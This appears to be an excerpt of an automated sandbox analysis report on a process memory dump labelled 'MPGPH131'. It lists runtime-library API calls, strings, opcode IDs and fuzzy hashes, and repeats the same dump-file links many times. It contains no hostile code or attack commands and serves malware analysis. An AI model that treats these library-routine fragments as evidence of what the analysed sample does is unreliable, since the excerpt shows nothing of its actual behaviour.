                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e960d014f3c8ae318d272a9043a6516235157a519ff08182985810210f45c651
                                    • Instruction ID: 4b54c51d10aedeee38a2eaf0b13e9be615ccfdb40c5853ba60d2232ba9781cba
                                    • Opcode Fuzzy Hash: e960d014f3c8ae318d272a9043a6516235157a519ff08182985810210f45c651
                                    • Instruction Fuzzy Hash: B6F0E932605135679B326A71BC06B9F774EBF81760B17C516FC08A6098CB78EE0886E1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 332 92489d-9248a9 333 9248db-9248e6 call 91acaf 332->333 334 9248ab-9248ad 332->334 342 9248e8-9248ea 333->342 335 9248c6-9248d7 RtlAllocateHeap 334->335 336 9248af-9248b0 334->336 338 9248b2-9248b9 call 921a03 335->338 339 9248d9 335->339 336->335 338->333 344 9248bb-9248c4 call 91f248 338->344 339->342 344->333 344->335
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0090E0EB,?,?,?,?,?,00832D8D,0090B16C,?,?,0090B16C), ref: 009248D0
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
                                    • Instruction ID: 165b2fea8b796bf76ac9b7ef40a3b5b52bc0e6afde2698107032f618ebf9328d
                                    • Opcode Fuzzy Hash: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
                                    • Instruction Fuzzy Hash: 3CE06D312666B5A7EA213775BC05BAB764DCF827A0F160631AC58A6098DBA0DC5092E2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AEB3
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AED5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089AEF5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089AF1F
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0089AF8D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0089AFD9
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0089AFF3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0089B088
                                    • std::_Facet_Register.LIBCPMT ref: 0089B095
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
                                    • Instruction ID: 3633ffd5ebbd686a1bcb5cbae962c08b07d5a8eac1d4d1752c1f9b410a1c8588
                                    • Opcode Fuzzy Hash: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
                                    • Instruction Fuzzy Hash: 32618FB1D002489FDF25EFA4D885B9EBBB4FF54310F184068E815E7281EB74E909CB92
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008337E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00833835
                                    • __Getctype.LIBCPMT ref: 0083384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0083386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 008338FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: bad locale name
                                    • API String ID: 1840309910-1405518554
                                    • Opcode ID: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
                                    • Instruction ID: 3e1d8eba16de450203cf0a7c27a5c6d14f9aec52586b4c12fef91d7e31af422b
                                    • Opcode Fuzzy Hash: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
                                    • Instruction Fuzzy Hash: FC515EF1D00248DBDB10DFA8D88579EFBB8AF54314F144569EC18AB281E775AA48CB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 009108B7
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 009108BF
                                    • _ValidateLocalCookies.LIBCMT ref: 00910948
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00910973
                                    • _ValidateLocalCookies.LIBCMT ref: 009109C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
                                    • Instruction ID: 779e5196270de1f02ee3f05951ae80f98a6e88a540b8e97ec691e262857a04e7
                                    • Opcode Fuzzy Hash: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
                                    • Instruction Fuzzy Hash: D841B234B0020DABDF10DF68C890BEE7BA9AF84324F148055E9189B352D776EAC5CB91
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00899543
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00899566
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00899586
                                    • std::_Facet_Register.LIBCPMT ref: 008995FB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00899613
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0089962B
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
                                    • Instruction ID: eb44711276c718821d91ad609700a5d3161983fa001d2db6998e0bf7a11bd024
                                    • Opcode Fuzzy Hash: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
                                    • Instruction Fuzzy Hash: B841C0719042199FCF12EF58D841BAEBBB4FB41314F1A421DE895AB391DB70AD00CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008360F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0083617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00836248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 008361CC
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
                                    • Instruction ID: 6abc2432ae1aa8394e4f1908dde132cecd307a0d681bc790e2a7d9b386dd8c65
                                    • Opcode Fuzzy Hash: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
                                    • Instruction Fuzzy Hash: CEE1E2B19006089FCB28DF68D845B9EB7F9FF84700F14861DE456E7781EB74AA44CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008386DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008386ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
                                    • Instruction ID: ecadccc9c029574b4aa03c6224bf2cc2ad88356f850395210eee04ce2f320956
                                    • Opcode Fuzzy Hash: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
                                    • Instruction Fuzzy Hash: 98612771A002089FDB08DB68DC85BAEBBB5FF84314F148618F415E7792EB74AA8487D1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3946
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A395F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3A97
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3AB0
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3C16
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A3C2F
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4479
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4492
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
                                    • Instruction ID: 608fd010909d0e36fff6e03786e85f6cbe4fadffd1502c0fd638d7a98cc45c84
                                    • Opcode Fuzzy Hash: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
                                    • Instruction Fuzzy Hash: 1951D070C01258DFEF14DBA8CD85BDEBBB4BF46304F144258E055A7682D7746A88CB62
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00833C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
                                    • Instruction ID: 69dbacdfd89e02f1a3e756a8d3ad0db787793b84228586769ec533d15876319d
                                    • Opcode Fuzzy Hash: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
                                    • Instruction Fuzzy Hash: ED1193B29007086BC710DE59D805B96B7E8EF85320F14892AFD58D7641F770A954CBD1
                                    Strings
                                    • unordered_map/set too long, xrefs: 008A2F43
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
                                    • Instruction ID: 97c2cf56752f55eb0153d999ddb41ea8c71a43833ca59694411cbe95696e99a7
                                    • Opcode Fuzzy Hash: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
